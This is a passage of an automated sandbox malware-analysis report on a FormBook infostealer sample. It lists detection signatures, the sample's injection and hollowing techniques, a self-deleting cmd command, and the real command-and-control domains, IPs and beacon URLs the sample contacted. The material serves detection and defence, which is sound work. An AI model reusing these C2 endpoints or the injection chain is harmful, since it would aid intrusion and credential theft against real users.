Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8A62 mov eax, dword ptr fs:[00000030h] 6_2_046D8A62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464927A mov eax, dword ptr fs:[00000030h] 6_2_0464927A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609240 mov eax, dword ptr fs:[00000030h] 6_2_04609240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CEA55 mov eax, dword ptr fs:[00000030h] 6_2_046CEA55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04694257 mov eax, dword ptr fs:[00000030h] 6_2_04694257
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h] 6_2_04644A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04644A2C mov eax, dword ptr fs:[00000030h] 6_2_04644A2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04618A0A mov eax, dword ptr fs:[00000030h] 6_2_04618A0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov ecx, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04605210 mov eax, dword ptr fs:[00000030h] 6_2_04605210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460AA16 mov eax, dword ptr fs:[00000030h] 6_2_0460AA16
Enables debug privileges
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.borderlesstrade.info
Source: C:\Windows\explorer.exe Domain query: www.swashbug.com
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.253.212.22 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.hispekdiamond.com
Source: C:\Windows\explorer.exe Domain query: www.bl927.com
Source: C:\Windows\explorer.exe Domain query: www.7chd.com
Source: C:\Windows\explorer.exe Network Connect: 52.15.160.167 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 213.171.195.105 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.zagorafinancial.com
Source: C:\Windows\explorer.exe Network Connect: 45.142.156.44 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 162.209.114.201 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.montcoimmigrationlawyer.com
Source: C:\Windows\explorer.exe Network Connect: 81.169.145.72 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mojilifenoosa.com
Source: C:\Windows\explorer.exe Domain query: www.3992199.com
Source: C:\Windows\explorer.exe Domain query: www.fibermover.com
Source: C:\Windows\explorer.exe Domain query: www.funnyfootballmugs.com
Source: C:\Windows\explorer.exe Domain query: www.przyczepy.net
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 169.1.24.244 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.cdefenders.com
Contains functionality to prevent local Windows debugging
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_740D1000 Rcxlxosdkhvclf,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,VirtualProtect, 0_2_740D1000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Users\user\Desktop\NdBLyH2h5d.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Thread register set: target process: 3388 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 300000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Process created: C:\Users\user\Desktop\NdBLyH2h5d.exe 'C:\Users\user\Desktop\NdBLyH2h5d.exe' Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NdBLyH2h5d.exe' Jump to behavior
Source: explorer.exe, 00000004.00000002.478596652.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.220689097.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 385309 Sample: NdBLyH2h5d.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 32 www.plaisterpress.com 2->32 34 www.missjeschickt.com 2->34 36 missjeschickt.com 2->36 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 4 other signatures 2->60 11 NdBLyH2h5d.exe 18 2->11         started        signatures3 process4 dnsIp5 44 192.168.2.1 unknown unknown 11->44 30 C:\Users\user\AppData\...\6oxdti6l9qd.dll, PE32 11->30 dropped 70 Detected unpacking (changes PE section rights) 11->70 72 Maps a DLL or memory area into another process 11->72 74 Tries to detect virtualization through RDTSC time measurements 11->74 76 Contains functionality to prevent local Windows debugging 11->76 16 NdBLyH2h5d.exe 11->16         started        file6 signatures7 process8 signatures9 46 Modifies the context of a thread in another process (thread injection) 16->46 48 Maps a DLL or memory area into another process 16->48 50 Sample uses process hollowing technique 16->50 52 Queues an APC in another process (thread injection) 16->52 19 explorer.exe 16->19 injected process10 dnsIp11 38 missjeschickt.com 81.169.145.72, 49734, 80 STRATOSTRATOAGDE Germany 19->38 40 zagorafinancial.com 162.209.114.201, 49723, 80 RACKSPACEUS United States 19->40 42 20 other IPs or domains 19->42 62 System process connects to network (likely due to code injection or exploit) 19->62 23 rundll32.exe 19->23         started        signatures12 process13 signatures14 64 Modifies the context of a thread in another process (thread injection) 23->64 66 Maps a DLL or memory area into another process 23->66 68 Tries to detect virtualization through RDTSC time measurements 23->68 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.142.156.44
 k9cdna.51w4.com United Kingdom
40065 CNSERVERSUS true
23.227.38.74
 shops.myshopify.com Canada
13335 CLOUDFLARENETUS true
184.168.131.241
 montcoimmigrationlawyer.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
162.209.114.201
 zagorafinancial.com United States
27357 RACKSPACEUS true
185.253.212.22
 www.przyczepy.net Poland
48707 GREENER-ASPL true
81.169.145.72
 missjeschickt.com Germany
6724 STRATOSTRATOAGDE true
34.102.136.180
 fibermover.com United States
15169 GOOGLEUS false
169.1.24.244
 www.swashbug.com South Africa
37611 AfrihostZA true
52.15.160.167
 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com United States
16509 AMAZON-02US false
213.171.195.105
 www.hispekdiamond.com United Kingdom
8560 ONEANDONE-ASBrauerstrasse48DE true

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 52.15.160.167 true
montcoimmigrationlawyer.com 184.168.131.241 true
missjeschickt.com 81.169.145.72 true
www.przyczepy.net 185.253.212.22 true
k9cdna.51w4.com 45.142.156.44 true
www.swashbug.com 169.1.24.244 true
mojilifenoosa.com 184.168.131.241 true
zagorafinancial.com 162.209.114.201 true
shops.myshopify.com 23.227.38.74 true
fibermover.com 34.102.136.180 true
www.hispekdiamond.com 213.171.195.105 true
www.plaisterpress.com 104.21.24.135 true
www.borderlesstrade.info unknown unknown
www.bl927.com unknown unknown
www.montcoimmigrationlawyer.com unknown unknown
www.mojilifenoosa.com unknown unknown
www.missjeschickt.com unknown unknown
www.3992199.com unknown unknown
www.fibermover.com unknown unknown
www.funnyfootballmugs.com unknown unknown
www.7chd.com unknown unknown
www.cdefenders.com unknown unknown
www.zagorafinancial.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.fibermover.com/uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp false
  • Avira URL Cloud: safe
 unknown
http://www.7chd.com/uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: malware
 unknown
http://www.missjeschickt.com/uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown
http://www.przyczepy.net/uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown
http://www.montcoimmigrationlawyer.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown
http://www.funnyfootballmugs.com/uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown
www.montcoimmigrationlawyer.com/uoe8/ true
  • Avira URL Cloud: safe
 low
http://www.mojilifenoosa.com/uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown
http://www.3992199.com/uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown
http://www.zagorafinancial.com/uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown
http://www.swashbug.com/uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp true
  • Avira URL Cloud: safe
 unknown